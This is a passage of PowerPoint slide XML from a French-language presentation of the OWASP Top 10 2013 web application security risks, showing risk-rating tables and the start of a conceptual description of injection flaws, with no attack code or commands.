                <a:t>Impacts Techniques</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="126" name="TextBox 125"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5843516" y="588061"/>
              <a:ext cx="762000" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>Impacts Métier</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="24" name="Table 23"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="589918465"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="71558" y="6172200"/>
          <a:ext cx="4371153" cy="1097298"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="789754"/>
                <a:gridCol w="609600"/>
                <a:gridCol w="762000"/>
                <a:gridCol w="762000"/>
                <a:gridCol w="685800"/>
                <a:gridCol w="761999"/>
              </a:tblGrid>
              <a:tr h="457200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="700" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Agent de menace</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="700" b="1"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700" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Vecteur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="700" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="700" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>d’attaque</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="700" b="1"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700" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prévalence</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="700" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> de la </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="700" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>vulnérabilité</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="700" b="1"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700" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Détection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="700" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> de la </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="700" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>vulnérabilité</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="700" b="1"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700" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Impact t</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="700" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>echnique</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="700" b="1"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700" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Impact Métier</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="700" b="1"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198120">
                <a:tc rowSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="700" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="700" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Spécifiques</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="700" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> à</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="700" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="700" b="1" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>l’</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="700" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>application</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1"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700" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Facile</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="700"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700" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Trés</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="700" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="700" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>répandue</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="700"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700" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Facile</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="700"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700" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Sévère</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="700"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rowSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="700" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="700" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Spécifiques</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="700" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> à</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="700" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="700" b="1" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>l’</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="700" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="700" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="700" b="1" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ou</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="700" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> au métier</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="700" b="1"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0989">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="700" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Moyen</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="700"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700" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Commune</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="700"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700" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Moyen</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="700"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700" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Modéré</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="700"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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="220989">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="700" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Difficile</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="700"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700" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Rare</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="700"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700" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Difficile</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="700"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700" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Mineur</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="700"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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="802837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999510666"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-609600" y="990600"/>
          <a:ext cx="8153400" cy="800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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OWASP Top 10 2013 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Risques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Sécurité des Applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5"/>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T10</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2899343019"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="957457"/>
          <a:ext cx="6858000" cy="2654423"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
              </a:tblGrid>
              <a:tr h="642743">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="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fr-FR" sz="1000" noProof="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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="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hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="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fr-FR" sz="1000" noProof="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r>
              <a:tr h="383569">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>?</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Exploitation</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>FACILE</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Fréquence</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>COMMUNE</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="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fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Détection</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>MOYENNE</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Im</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>pact</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>SEVERE</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>?</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" noProof="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490563">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considérez</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> que n’importe qui peut envoyer des données non fiables </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>au système,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> y compris les utilisateurs externes, internes, et administrateurs.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>L’attaquant utilise des scripts qui exploitent </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>la syntaxe d’un interpréteur cible. Presque toute source de données peut être un vecteur d’injection, y compris des sources internes.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="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fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Les failles d’Injection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> surviennent lorsqu’une application envoie des données non fiable à un interpréteur. Les failles d’injection sont très fréquentes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, surtout dans le code ancien.  On les retrouve souvent dans les requêtes SQL, LDAP, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>XPath</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, commandes OS, parseurs XML, arguments de programme, etc. Les failles d’Injection sont faciles à découvrir lors d’un audit de code, mais plus difficilement via test. Scanners et </a:t>
                      </a:r>
                      <a:r>
